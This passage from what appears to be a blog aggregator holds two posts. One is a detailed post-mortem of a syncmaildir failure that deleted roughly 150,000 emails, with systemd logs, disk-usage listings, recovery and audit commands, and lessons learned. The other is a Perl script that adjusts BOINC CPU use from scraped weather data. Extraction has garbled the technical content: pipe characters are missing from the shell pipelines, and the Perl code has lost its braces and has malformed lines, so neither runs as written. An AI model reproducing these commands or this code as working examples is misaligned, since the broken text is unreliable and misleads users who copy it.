mar 22 16:13:00 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:13:00 curie smd-pull[4801]: rm: impossible de supprimer '/home/anarcat/.smd/workarea/Maildir': Le dossier n'est pas vide
mar 22 16:13:00 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:13:00 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:13:00 curie systemd[3199]: Failed to start pull emails with syncmaildir.
mar 22 16:14:00 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:14:00 curie smd-pull[7025]:  4091 ?        00:00:00 smd-push
mar 22 16:14:00 curie smd-pull[7025]: Already running.
mar 22 16:14:00 curie smd-pull[7025]: If this is not the case, remove /home/anarcat/.smd/lock by hand.
mar 22 16:14:00 curie smd-pull[7025]: any: smd-pushpull@localhost: TAGS: error::context(locking) probable-cause(another-instance-is-running) human-intervention(necessary) suggested-actions(run(kill 4091) run(rm /home/anarcat/.smd/lock))
mar 22 16:14:00 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:14:00 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:14:00 curie systemd[3199]: Failed to start pull emails with syncmaildir.
Then it seems like smd-push (from curie) started destroying the universe for some reason:
mar 22 16:20:00 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:20:00 curie smd-pull[9319]:  4091 ?        00:00:00 smd-push
mar 22 16:20:00 curie smd-pull[9319]: Already running.
mar 22 16:20:00 curie smd-pull[9319]: If this is not the case, remove /home/anarcat/.smd/lock by hand.
mar 22 16:20:00 curie smd-pull[9319]: any: smd-pushpull@localhost: TAGS: error::context(locking) probable-cause(another-instance-is-running) human-intervention(necessary) suggested-actions(ru
mar 22 16:20:00 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:20:00 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:20:00 curie systemd[3199]: Failed to start pull emails with syncmaildir.
mar 22 16:21:34 curie smd-push[4091]: default: smd-client@smd-server-anarcat: TAGS: stats::new-mails(0), del-mails(293920), bytes-received(0), xdelta-received(26995)
mar 22 16:21:35 curie smd-push[9374]: register: smd-client@smd-server-register: TAGS: stats::new-mails(0), del-mails(0), bytes-received(0), xdelta-received(215)
mar 22 16:21:35 curie systemd[3199]: smd-push.service: Succeeded.
Notice the del-mails(293920) there: it is actively trying to destroy basically every email in my mail spool. Then somehow push and pull started both at once:
mar 22 16:21:35 curie systemd[3199]: Started push emails with syncmaildir.
mar 22 16:21:35 curie systemd[3199]: Starting push emails with syncmaildir...
mar 22 16:22:00 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:22:00 curie smd-pull[10333]:  9455 ?        00:00:00 smd-push
mar 22 16:22:00 curie smd-pull[10333]: Already running.
mar 22 16:22:00 curie smd-pull[10333]: If this is not the case, remove /home/anarcat/.smd/lock by hand.
mar 22 16:22:00 curie smd-pull[10333]: any: smd-pushpull@localhost: TAGS: error::context(locking) probable-cause(another-instance-is-running) human-intervention(necessary) suggested-actions(r
mar 22 16:22:00 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:22:00 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:22:00 curie systemd[3199]: Failed to start pull emails with syncmaildir.
mar 22 16:22:00 curie smd-push[9455]: smd-client: ERROR: Data transmission failed.
mar 22 16:22:00 curie smd-push[9455]: smd-client: ERROR: This problem is transient, please retry.
mar 22 16:22:00 curie smd-push[9455]: smd-client: ERROR: server sent ABORT or connection died
mar 22 16:22:00 curie smd-push[9455]: smd-server: ERROR: Unable to open Maildir/.kobo/cur/1498563708.M122624P22121.marcos,S=32234,W=32792:2,S: Maildir/.kobo/cur/1498563708.M122624P22121.marco
mar 22 16:22:00 curie smd-push[9455]: smd-server: ERROR: The problem should be transient, please retry.
mar 22 16:22:00 curie smd-push[9455]: smd-server: ERROR: Unable to open requested file.
mar 22 16:22:00 curie smd-push[9455]: default: smd-client@smd-server-anarcat: TAGS: stats::new-mails(0), del-mails(293920), bytes-received(0), xdelta-received(26995)
mar 22 16:22:00 curie smd-push[9455]: default: smd-client@smd-server-anarcat: TAGS: error::context(receive) probable-cause(network) human-intervention(avoidable) suggested-actions(retry)
mar 22 16:22:00 curie smd-push[9455]: default: smd-server@localhost: TAGS: error::context(transmit) probable-cause(simultaneous-mailbox-edit) human-intervention(avoidable) suggested-actions(r
mar 22 16:22:00 curie systemd[3199]: smd-push.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:22:00 curie systemd[3199]: smd-push.service: Failed with result 'exit-code'.
mar 22 16:22:00 curie systemd[3199]: Failed to start push emails with syncmaildir.
There it seems push tried to destroy the universe again: del-mails(293920). Interestingly, the push started again in parallel with the pull, right that minute:
mar 22 16:22:00 curie systemd[3199]: Starting push emails with syncmaildir...
... but didn't complete for a while, here's pull trying to start again:
mar 22 16:24:00 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:24:00 curie smd-pull[12051]: 10466 ?        00:00:00 smd-push
mar 22 16:24:00 curie smd-pull[12051]: Already running.
mar 22 16:24:00 curie smd-pull[12051]: If this is not the case, remove /home/anarcat/.smd/lock by hand.
mar 22 16:24:00 curie smd-pull[12051]: any: smd-pushpull@localhost: TAGS: error::context(locking) probable-cause(another-instance-is-running) human-intervention(necessary) suggested-actions(run(kill 10466) run(rm /home/anarcat/.smd/lock))
mar 22 16:24:00 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:24:00 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:24:00 curie systemd[3199]: Failed to start pull emails with syncmaildir.
... and the long push finally resolving:
mar 22 16:24:00 curie smd-push[10466]: smd-client: ERROR: Data transmission failed.
mar 22 16:24:00 curie smd-push[10466]: smd-client: ERROR: This problem is transient, please retry.
mar 22 16:24:00 curie smd-push[10466]: smd-client: ERROR: server sent ABORT or connection died
mar 22 16:24:00 curie smd-push[10466]: smd-client: ERROR: Data transmission failed.
mar 22 16:24:00 curie smd-push[10466]: smd-client: ERROR: This problem is transient, please retry.
mar 22 16:24:00 curie smd-push[10466]: smd-client: ERROR: server sent ABORT or connection died
mar 22 16:24:00 curie smd-push[10466]: smd-server: ERROR: Unable to open Maildir/.kobo/cur/1498563708.M122624P22121.marcos,S=32234,W=32792:2,S: Maildir/.kobo/cur/1498563708.M122624P22121.marcos,S=32234,W=32792:2,S: No such file or directory
mar 22 16:24:00 curie smd-push[10466]: smd-server: ERROR: The problem should be transient, please retry.
mar 22 16:24:00 curie smd-push[10466]: smd-server: ERROR: Unable to open requested file.
mar 22 16:24:00 curie smd-push[10466]: default: smd-client@smd-server-anarcat: TAGS: stats::new-mails(0), del-mails(293920), bytes-received(0), xdelta-received(26995)
mar 22 16:24:00 curie smd-push[10466]: default: smd-client@smd-server-anarcat: TAGS: error::context(receive) probable-cause(network) human-intervention(avoidable) suggested-actions(retry)
mar 22 16:24:00 curie smd-push[10466]: default: smd-server@localhost: TAGS: error::context(transmit) probable-cause(simultaneous-mailbox-edit) human-intervention(avoidable) suggested-actions(retry)
mar 22 16:24:00 curie systemd[3199]: smd-push.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:24:00 curie systemd[3199]: smd-push.service: Failed with result 'exit-code'.
mar 22 16:24:00 curie systemd[3199]: Failed to start push emails with syncmaildir.
mar 22 16:24:00 curie systemd[3199]: Starting push emails with syncmaildir...
This pattern repeats until 16:35, when that locking issue silently recovered somehow:
mar 22 16:35:03 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:35:41 curie smd-pull[20788]: default: smd-client@localhost: TAGS: stats::new-mails(5), del-mails(1), bytes-received(21885), xdelta-received(6863398)
mar 22 16:35:42 curie smd-pull[21373]: register: smd-client@localhost: TAGS: stats::new-mails(0), del-mails(0), bytes-received(0), xdelta-received(215)
mar 22 16:35:42 curie systemd[3199]: smd-pull.service: Succeeded.
mar 22 16:35:42 curie systemd[3199]: Started pull emails with syncmaildir.
mar 22 16:36:35 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:36:36 curie smd-pull[21738]: default: smd-client@localhost: TAGS: stats::new-mails(0), del-mails(0), bytes-received(0), xdelta-received(214)
mar 22 16:36:37 curie smd-pull[21816]: register: smd-client@localhost: TAGS: stats::new-mails(0), del-mails(0), bytes-received(0), xdelta-received(215)
mar 22 16:36:37 curie systemd[3199]: smd-pull.service: Succeeded.
mar 22 16:36:37 curie systemd[3199]: Started pull emails with syncmaildir.
... notice that huge xdelta-received there, that's 7GB right there. Mysteriously, the curie mail spool survived this, possibly because smd-pull started failing again:
mar 22 16:38:00 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:38:00 curie smd-pull[23556]: 21887 ?        00:00:00 smd-push
mar 22 16:38:00 curie smd-pull[23556]: Already running.
mar 22 16:38:00 curie smd-pull[23556]: If this is not the case, remove /home/anarcat/.smd/lock by hand.
mar 22 16:38:00 curie smd-pull[23556]: any: smd-pushpull@localhost: TAGS: error::context(locking) probable-cause(another-instance-is-running) human-intervention(necessary) suggested-actions(run(kill 21887) run(rm /home/anarcat/.smd/lock))
mar 22 16:38:00 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:38:00 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:38:00 curie systemd[3199]: Failed to start pull emails with syncmaildir.
That could have been when i got on angela to check my mail, and it was busy doing the nasty removal stuff... although the times don't match. Here is when angela came back online:
anarcat@angela:~(main)$ last
anarcat  :0           :0               Mon Mar 22 19:57   still logged in
reboot   system boot  5.10.0-0.bpo.3-a Mon Mar 22 19:57   still running
anarcat  :0           :0               Mon Mar 22 17:43 - 18:47  (01:03)
reboot   system boot  5.10.0-0.bpo.3-a Mon Mar 22 17:39   still running
Then finally the sync on curie started failing with:
mar 22 16:46:35 curie systemd[3199]: Starting pull emails with syncmaildir...
mar 22 16:46:42 curie smd-pull[27455]: smd-server: ERROR: Client aborted, removing /home/anarcat/.smd/curie-anarcat__Maildir.db.txt.new and /home/anarcat/.smd/curie-anarcat__Maildir.db.txt.mtime.new
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR: Failed to copy Maildir/.debian/cur/1613401668.M901837P27073.marcos,S=3740,W=3815:2,S to Maildir/.koumbit/cur/1613401640.M415457P27063.marcos,S=3790,W=3865:2,S
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR: The destination already exists but its content differs.
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR: To fix this problem you have two options:
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR: - rename Maildir/.koumbit/cur/1613401640.M415457P27063.marcos,S=3790,W=3865:2,S by hand so that Maildir/.debian/cur/1613401668.M901837P27073.marcos,S=3740,W=3815:2,S
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR:   can be copied without replacing it.
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR:   Executing  cd; mv -n "Maildir/.koumbit/cur/1613401640.M415457P27063.marcos,S=3790,W=3865:2,S" "Maildir/.koumbit/cur/1616446002.1.localhost"  should work.
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR: - run smd-push so that your changes to Maildir/.koumbit/cur/1613401640.M415457P27063.marcos,S=3790,W=3865:2,S
mar 22 16:46:42 curie smd-pull[27455]: smd-client: ERROR:   are propagated to the other mailbox
mar 22 16:46:42 curie smd-pull[27455]: default: smd-client@localhost: TAGS: error::context(copy-message) probable-cause(concurrent-mailbox-edit) human-intervention(necessary) suggested-actions(run(mv -n "/home/anarcat/.smd/workarea/Maildir/.koumbit/cur/1613401640.M415457P27063.marcos,S=3790,W=3865:2,S" "/home/anarcat/.smd/workarea/Maildir/.koumbit/tmp/1613401640.M415457P27063.marcos,S=3790,W=3865:2,S") run(smd-push default))
mar 22 16:46:42 curie systemd[3199]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 16:46:42 curie systemd[3199]: smd-pull.service: Failed with result 'exit-code'.
mar 22 16:46:42 curie systemd[3199]: Failed to start pull emails with syncmaildir.
It went on like this until I found the problem. This is, presumably, a good thing because those emails were not being destroyed. On angela, things looked like this:
-- Reboot --
mar 22 17:39:29 angela systemd[1677]: Started run notmuch new at least once a day.
mar 22 17:39:29 angela systemd[1677]: Started run smd-pull regularly.
mar 22 17:40:46 angela systemd[1677]: Starting pull emails with syncmaildir...
mar 22 17:43:18 angela smd-pull[3916]: smd-server: ERROR: Unable to open Maildir/.tor/new/1616446842.M285912P26118.marcos,S=8860,W=8996: Maildir/.tor/new/1616446842.M285912P26118.marcos,S=886
0,W=8996: No such file or directory
mar 22 17:43:18 angela smd-pull[3916]: smd-server: ERROR: The problem should be transient, please retry.
mar 22 17:43:18 angela smd-pull[3916]: smd-server: ERROR: Unable to open requested file.
mar 22 17:43:18 angela smd-pull[3916]: smd-client: ERROR: Data transmission failed.
mar 22 17:43:18 angela smd-pull[3916]: smd-client: ERROR: This problem is transient, please retry.
mar 22 17:43:18 angela smd-pull[3916]: smd-client: ERROR: server sent ABORT or connection died
mar 22 17:43:18 angela smd-pull[3916]: default: smd-server@smd-server-anarcat: TAGS: error::context(transmit) probable-cause(simultaneous-mailbox-edit) human-intervention(avoidable) suggested
-actions(retry)
mar 22 17:43:18 angela smd-pull[3916]: default: smd-client@localhost: TAGS: error::context(receive) probable-cause(network) human-intervention(avoidable) suggested-actions(retry)
mar 22 17:43:18 angela systemd[1677]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
mar 22 17:43:18 angela systemd[1677]: smd-pull.service: Failed with result 'exit-code'.
mar 22 17:43:18 angela systemd[1677]: Failed to start pull emails with syncmaildir.
mar 22 17:43:18 angela systemd[1677]: Starting pull emails with syncmaildir...
mar 22 17:43:29 angela smd-pull[4847]: default: smd-client@localhost: TAGS: stats::new-mails(29), del-mails(0), bytes-received(401519), xdelta-received(38914)
mar 22 17:43:29 angela smd-pull[5600]: register: smd-client@localhost: TAGS: stats::new-mails(2), del-mails(0), bytes-received(92150), xdelta-received(471)
mar 22 17:43:29 angela systemd[1677]: smd-pull.service: Succeeded.
mar 22 17:43:29 angela systemd[1677]: Started pull emails with syncmaildir.
mar 22 17:43:29 angela systemd[1677]: Starting push emails with syncmaildir...
mar 22 17:43:32 angela smd-push[5693]: default: smd-client@smd-server-anarcat: TAGS: stats::new-mails(0), del-mails(0), bytes-received(0), xdelta-received(217)
mar 22 17:43:33 angela smd-push[6575]: register: smd-client@smd-server-register: TAGS: stats::new-mails(0), del-mails(0), bytes-received(0), xdelta-received(219)
mar 22 17:43:33 angela systemd[1677]: smd-push.service: Succeeded.
mar 22 17:43:33 angela systemd[1677]: Started push emails with syncmaildir.
Notice how long it took to get the first error, in that first failure: it failed after 3 minutes! Presumably that's when it started deleting all that mail. And this is during pull, not push, so the error didn't come from angela.

Affected data It seems 2GB of mail from my main INBOX was destroyed. Another 2.4GB of spam (kept for training purposes) was also destroyed, along with 700MB of Sent mail. The rest is hard to figure out, because the folders are actually still there, just smaller. So I relied on ncdu to figure out the size changes. (Note that I don't really archive (or delete much of) my mail since I use notmuch, which is why the INBOX is so large...) Concretely, according to the notmuch-new.service which still runs periodically on marcos, here are the changes that happened on the server:
mar 22 16:17:12 marcos notmuch[10729]: Added 7 new messages to the database. Removed 57985 messages. Detected 1372 file renames.
mar 22 16:22:43 marcos notmuch[12826]: No new mail. Removed 143842 messages. Detected 6072 file renames.
mar 22 16:27:02 marcos notmuch[13969]: No new mail. Removed 82071 messages. Detected 1783 file renames.
mar 22 16:29:45 marcos notmuch[15079]: Added 22743 new messages to the database. Detected 1 file rename.
mar 22 16:31:48 marcos notmuch[16196]: Added 22779 new messages to the database. Removed 5 messages.
mar 22 16:33:11 marcos notmuch[17192]: Added 3711 new messages to the database.
mar 22 16:40:41 marcos notmuch[19122]: Added 74558 new messages to the database. Detected 1 file rename.
mar 22 16:43:21 marcos notmuch[20325]: Added 9061 new messages to the database. Detected 4 file renames.
mar 22 17:43:08 marcos notmuch[7420]: Added 1793 new messages to the database. Detected 6 file renames.
That is basically the entire mail spool destroyed at first (283 898 messages), and then bits and pieces of it progressively re-added (134 645 messages), somehow, so 149 253 mails were lost, presumably.

Recovery I disabled the services all over the place:
systemctl --user --now disable smd-pull.service smd-pull.timer smd-push.service smd-push.timer notmuch-new.service notmuch-new.timer
(Well, technically, I did that only on angela, as I thought the problem was there. Luckily, curie kept going but it seems like it was harmless.) I made a backup of the mail spool on curie:
tar cf - Maildir/   pv -s 14G   gzip -c > Maildir.tgz
Then I crossed my fingers and ran smd-push -v -s, as that was suggested by smd error codes themselves. That thankfully started restoring mail. It failed a few times on weird cases of files being duplicates, but I resolved this by following the instructions. Or mostly: I actually deleted the files instead of moving them, which made smd even unhappier (if there ever was such a thing). I had to recreate some of those files, so, lesson learned: do follow the advice smd gives you, even if it seems useless or strange. But then smd-push was humming along, uploading tens of thousands of messages, saturating the upload in the office, refilling the mail spool on the server... yaay!... ? Except... well, of course that didn't quite work: the mail spool in the office eventually started to grow beyond the size of the mail spool on the workstation. That is what smd-push eventually settled on:
default: smd-client@smd-server-anarcat: TAGS: error::context(receive) probable-cause(network) human-intervention(avoidable) suggested-actions(retry)
default: smd-client@smd-server-anarcat: TAGS: error::context(receive) probable-cause(network) human-intervention(avoidable) suggested-actions(retry)
default: smd-client@smd-server-anarcat: TAGS: stats::new-mails(151697), del-mails(0), bytes-received(7539147811), xdelta-received(10881198)
It recreated 151 697 emails, adding about 2000 emails to the pool, kind of from nowhere at all. On marcos, before:
ncdu 1.13 ~ Use the arrow keys to navigate, press ? for help
--- /home/anarcat/Maildir ------------------------------------
    4,0 GiB [##########] /.notmuch
  717,3 MiB [#         ] /.Archives.2014
  498,2 MiB [#         ] /.feeds.debian-planet
  453,1 MiB [#         ] /.Archives.2012
  414,5 MiB [#         ] /.debian
  408,2 MiB [#         ] /.quoifaire
  389,8 MiB [          ] /.rapports
  356,6 MiB [          ] /.tor
  182,6 MiB [          ] /.koumbit
  179,8 MiB [          ] /tmp
   56,8 MiB [          ] /.nn
   43,0 MiB [          ] /.act-mtl
   32,6 MiB [          ] /.feeds.sysadvent
   31,7 MiB [          ] /.feeds.releases
   31,4 MiB [          ] /.Sent.2005
   26,3 MiB [          ] /.sage
   25,5 MiB [          ] /.freedombox
   24,0 MiB [          ] /.feeds.git-annex
   21,1 MiB [          ] /.Archives.2011
   19,1 MiB [          ] /.Sent.2003
   16,7 MiB [          ] /.bugtraq
   16,2 MiB [          ] /.mlug
 Total disk usage:   8,0 GiB  Apparent size:   7,6 GiB  Items: 184426
After:
ncdu 1.13 ~ Use the arrow keys to navigate, press ? for help
--- /home/anarcat/Maildir ------------------------------------
    4,7 GiB [##########] /.notmuch
    2,7 GiB [#####     ] /.junk
    1,9 GiB [###       ] /cur
  717,3 MiB [#         ] /.Archives.2014
  659,3 MiB [#         ] /.Sent
  513,9 MiB [#         ] /.Archives.2012
  498,2 MiB [#         ] /.feeds.debian-planet
  449,6 MiB [          ] /.Archives.2015
  414,5 MiB [          ] /.debian
  408,2 MiB [          ] /.quoifaire
  389,8 MiB [          ] /.rapports
  380,8 MiB [          ] /.Archives.2013
  356,6 MiB [          ] /.tor
  261,1 MiB [          ] /.Archives.2011
  240,9 MiB [          ] /.koumbit
  183,6 MiB [          ] /.Archives.2010
  179,8 MiB [          ] /tmp
  128,4 MiB [          ] /.lists
  106,1 MiB [          ] /.inso-interne
  103,0 MiB [          ] /.github
   75,0 MiB [          ] /.nanog
   69,8 MiB [          ] /.full-disclosure
 Total disk usage:  16,2 GiB  Apparent size:  15,5 GiB  Items: 341143
That is 156 717 files more. On curie:
ncdu 1.13 ~ Use the arrow keys to navigate, press ? for help
--- /home/anarcat/Maildir ------------------------------------------------------------------
    2,7 GiB [##########] /.junk
    2,3 GiB [########  ] /.notmuch
    1,9 GiB [######    ] /cur
  661,2 MiB [##        ] /.Archives.2014
  655,3 MiB [##        ] /.Sent
  512,0 MiB [#         ] /.Archives.2012
  447,3 MiB [#         ] /.Archives.2015
  438,5 MiB [#         ] /.feeds.debian-planet
  406,5 MiB [#         ] /.quoifaire
  383,6 MiB [#         ] /.debian
  378,6 MiB [#         ] /.Archives.2013
  303,3 MiB [#         ] /.tor
  296,0 MiB [#         ] /.rapports
  237,6 MiB [          ] /.koumbit
  233,2 MiB [          ] /.Archives.2011
  182,1 MiB [          ] /.Archives.2010
  127,0 MiB [          ] /.lists
  104,8 MiB [          ] /.inso-interne
  102,7 MiB [          ] /.register
   89,6 MiB [          ] /.github
   67,1 MiB [          ] /.full-disclosure
   66,5 MiB [          ] /.nanog
 Total disk usage:  13,3 GiB  Apparent size:  12,6 GiB  Items: 342465
Interestingly, there are more files, but less disk usage. It's possible the notmuch database there is more efficient. So maybe there's nothing to worry about. Last night's marcos backup has:
root@marcos:/home/anarcat# find /mnt/home/anarcat/Maildir   pv -l   wc -l
 341k 0:00:16 [20,4k/s] [                             <=>                                                                                                                                     ]
341040
... 341040 files, which seems about right, considering some mail was delivered during the day. An audit can be performed with hashdeep:
borg mount /media/sdb2/borg/::marcos-auto-2021-03-22 /mnt
hashdeep -c sha256 -r /mnt/home/anarcat/Maildir   pv -l -s 341k > Maildir-backup-manifest.txt
And then compared with:
hashdeep -c sha256 -k Maildir-backup-manifest.txt Maildir/
Some extra files should show up in the Maildir, and very few should actually be missing, because I shouldn't have deleted mail from the previous day the next day, or at least very few. The actual summary hashdeep gave me was:
hashdeep: Audit failed
   Input files examined: 0
  Known files expecting: 0
          Files matched: 339080
Files partially matched: 0
            Files moved: 782
        New files found: 107
  Known files not found: 106
So 106 files added, 107 deleted. Seems good enough for me... Postfix was stopped at Mar 22 21:12:59 to try and stop external events from confusing things even further. I reviewed the delivery log to see if mail that came in during the problem window disappeared:
grep 'dovecot:.*stored mail into mailbox' /var/log/mail.log  
  tail -20  
  sed 's/.*msgid=<//;s/>.*//'   
  while read msgid; do 
    notmuch count --exclude=false id:$msgid  
      grep 0 && echo $msgid missing;
  done
And things looked okay. Now of course if we go further back, we find mail I actually deleted (because I do do that sometimes), so it's hard to use this log as an audit trail. We can only hope that the curie spool is sufficiently coherent to be relied on. Worst case, we'll have to restore from last night's backup, but that's getting far away now: I get hundreds of mails a day in that mail spool, and reseting back to last night does not seem like a good idea. A dry run of smd-pull on angela seems to agree that it's missing some files:
default: smd-client@localhost: TAGS: stats::new-mails(154914), del-mails(0), bytes-received(0), xdelta-received(0)
... a number of mails somewhere in between the other two, go figure. A "wet" run of this was started, without deletion (-n), which gave us:
default: smd-client@localhost: TAGS: stats::new-mails(154911), del-mails(0), bytes-received(7658160107), xdelta-received(10837609)
Strange that it sync'd three less emails, but that's still better than nothing, and we have a mail spool on angela again:
anarcat@angela:~(main)$ notmuch new
purging with prefix '.': spam moved (0), ham moved (0), deleted (0), done
Note: Ignoring non-mail file: /home/anarcat/Maildir//.uidvalidity
Processed 1779 total files in 26s (66 files/sec.).
Added 1190 new messages to the database. Removed 3 messages. Detected 593 file renames.
tagging with prefix '.': spam, sent, feeds, koumbit, tor, lists, rapports, folders, done.
Notice how only 1190 messages were re-added, that is because I killed notmuch before it had time to remove all those mails from its database.

Possible causes I am totally at a loss as to why smd started destroying everything like it did. But a few things come to mind:
  1. I rewired my office on that day.
  2. This meant unplugging curie, the workstation.
  3. It has a bad CMOS battery (known problem), so it jumped around the time continuum a few times, sometimes by years.
  4. The smd services are ran from a systemd unit with OnCalendar=*:0/2. I have heard that it's possible that major time jumps "pile up" execution of jobs, and it seems this happened in this case.
  5. It's possible that locking in smd is not as great as it could be, and that it corrupted its internal data structures on curie, which led it to command a destruction of the remote mail spool.
It's also possible that there was a disk failure on the server, marcos. But since it's running on a (software) RAID-1 array, and no errors have been found (according to dmesg), I don't think that's a plausible hypothesis.

Lessons learned
  1. follow what smd says, even if it seems useless or strange.
  2. trust but verify: just backup everything before you do anything, especially the largest data set.
  3. daily backups are not great for email, unless you're ready to lose a day of email (which I'm not).
  4. hashdeep is great. I keep finding new use cases for it. Last time it was to audit my camera SD card to make sure I didn't forget anything, and now this. it's fast and powerful.
  5. borg is great too. the FUSE mount was especially useful, and it was pretty fast to explore the backup, even through that overhead: checksumming 15GB of mail took about 35 minutes, which gives a respectable 8MB/s, probably bottlenecked by the crap external USB drive I use for backups (!).
  6. I really need to finish my backup system so that I have automated offsite backups, although in this case that would actually have been much slower (certainly not 8MB/s!).

Workarounds and solutions I setup fake-hwclock on curie, so that the next power failure will not upset my clock that badly. I am thinking of switching to ZFS or BTRFS for most of my filesystems, so that I can use filesystem snapshots (including remotely!) as a backup strategy. This seems so much more powerful than crawling the filesystem for changes, and allows for truly offsite backups protected from an attacker (hopefully). But it's a long way there. I'm also thinking of rebuilding my mail setup without smd. It's not the first time something like this happens with smd. It's the first time I am more confident it's the root cause of the problem, however, and it makes me really nervous for the future. I have used offlineimap in the past and it seems it was finally ported to Python 3 so that could be an option again. isync/mbsync is another option, which I tried before but do not remember why I didn't switch. A complete redesign with something like getmail and/or nncp could also be an option. But alas, I lack the time to go crazy with those experiments. Somehow, doing like everyone else and just going with Google still doesn't seem to be an option for me. Screw big tech. But I am afraid they will win, eventually. In any case, I'm just happy I got mail again, strangely.

5 January 2021

Russell Coker: Weather and Boinc

I just wrote a Perl script to look at the Australian Bureau of Meteorology pages to find the current temperature in an area and then adjust BOINC settings accordingly. The Perl script (in this post after the break, which shouldn t be in the RSS feed) takes the URL of a Bureau of Meteorology observation point as ARGV[0] and parses that to find the current (within the last hour) temperature. Then successive command line arguments are of the form 24:100 and 30:50 which indicate that at below 24C 100% of CPU cores should be used and below 30C 50% of CPU cores should be used. In warm weather having a couple of workstations in a room running BOINC (or any other CPU intensive task) will increase the temperature and also make excessive noise from cooling fans. To change the number of CPU cores used the script changes /etc/boinc-client/global_prefs_override.xml and then tells BOINC to reload that config file. This code is a little ugly (it doesn t properly parse XML, it just replaces a line of text) and could fail on a valid configuration file that wasn t produced by the current BOINC code. The parsing of the BoM page is a little ugly too, it relies on the HTML code in the BoM page they could make a page that looks identical which breaks the parsing or even a page that contains the same data that looks different. It would be nice if the BoM published some APIs for getting the weather. One thing that would be good is TXT records in the DNS. DNS supports caching with specified lifetime and is designed for high throughput in aggregate. If you had a million IOT devices polling the current temperature and forecasts every minute via DNS the people running the servers wouldn t even notice the load, while a million devices polling a web based API would be a significant load. As an aside I recommend playing nice and only running such a script every 30 minutes, the BoM page seems to be updated on the half hour so I have my cron jobs running at 5 and 35 minutes past the hour. If this code works for you then that s great. If it merely acts as an inspiration for developing your own code then that s great too! BOINC users outside Australia could replace the code for getting meteorological data (or even interface to a digital thermometer). Australians who use other CPU intensive batch jobs could take the BoM parsing code and replace the BOINC related code. If you write scripts inspired by this please blog about it and comment here with a link to your blog post.
#!/usr/bin/perl
use strict;
use Sys::Syslog;
# St Kilda Harbour RMYS
# http://www.bom.gov.au/products/IDV60901/IDV60901.95864.shtml
my $URL = $ARGV[0];
open(IN, "wget -o /dev/null -O - $URL ") or die "Can't get $URL";
while(<IN>)
 
  if($_ =~ /tr class=.rowleftcolumn/)
   
    last;
   
 
sub get_data
 
  if(not $_[0] =~ /headers=.t1-$_[1]/)
   
    return undef;
   
  $_[0] =~ s/^.*headers=.t1-$_[1]..//;
  $_[0] =~ s/<.td.*$//;
  return $_[0];
 
my @datetime;
my $cur_temp -100;
while(<IN>)
 
  chomp;
  if($_ =~ /^<.tr>$/)
   
    last;
   
  my $res;
  if($res = get_data($_, "datetime"))
   
    @datetime = split(/\//, $res)
   
  elsif($res = get_data($_, "tmp"))
   
    $cur_temp = $res;
   
 
close(IN);
if($#datetime != 1 or $cur_temp == -100)
 
  die "Can't parse BOM data";
 
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();
if($mday - $datetime[0] > 1 or ($datetime[0] > $mday and $mday != 1))
 
  die "Date wrong\n";
 
my $mins;
my @timearr = split(/:/, $datetime[1]);
$mins = $timearr[0] * 60 + $timearr [1];
if($timearr[1] =~ /pm/)
 
  $mins += 720;
 
if($mday != $datetime[0])
 
  $mins += 1440;
 
if($mins + 60 < $hour * 60 + $min)
 
  die "page outdated\n";
 
my %temp_hash;
foreach ( @ARGV[1..$#ARGV] )
 
  my @tmparr = split(/:/, $_);
  $temp_hash $tmparr[0]  = $tmparr[1];
 
my @temp_list = sort(keys(%temp_hash));
my $percent = 0;
my $i;
for($i = $#temp_list; $i >= 0 and $temp_list[$i] > $cur_temp; $i--)
 
  $percent = $temp_hash $temp_list[$i] 
 
my $prefs = "/etc/boinc-client/global_prefs_override.xml";
open(IN, "<$prefs") or die "Can't read $prefs";
my @prefs_contents;
while(<IN>)
 
  push(@prefs_contents, $_);
 
close(IN);
openlog("boincmgr-cron", "", "daemon");
my @cpus_pct = grep(/max_ncpus_pct/, @prefs_contents);
my $cpus_line = $cpus_pct[0];
$cpus_line =~ s/..max_ncpus_pct.$//;
$cpus_line =~ s/^.*max_ncpus_pct.//;
if($cpus_line == $percent)
 
  syslog("info", "Temp $cur_temp" . "C, already set to $percent");
  exit 0;
 
open(OUT, ">$prefs.new") or die "Can't read $prefs.new";
for($i = 0; $i <= $#prefs_contents; $i++)
 
  if($prefs_contents[$i] =~ /max_ncpus_pct/)
   
    print OUT "   <max_ncpus_pct>$percent.000000</max_ncpus_pct>\n";
   
  else
   
    print OUT $prefs_contents[$i];
   
 
close(OUT);
rename "$prefs.new", "$prefs" or die "can't rename";
system("boinccmd --read_global_prefs_override");
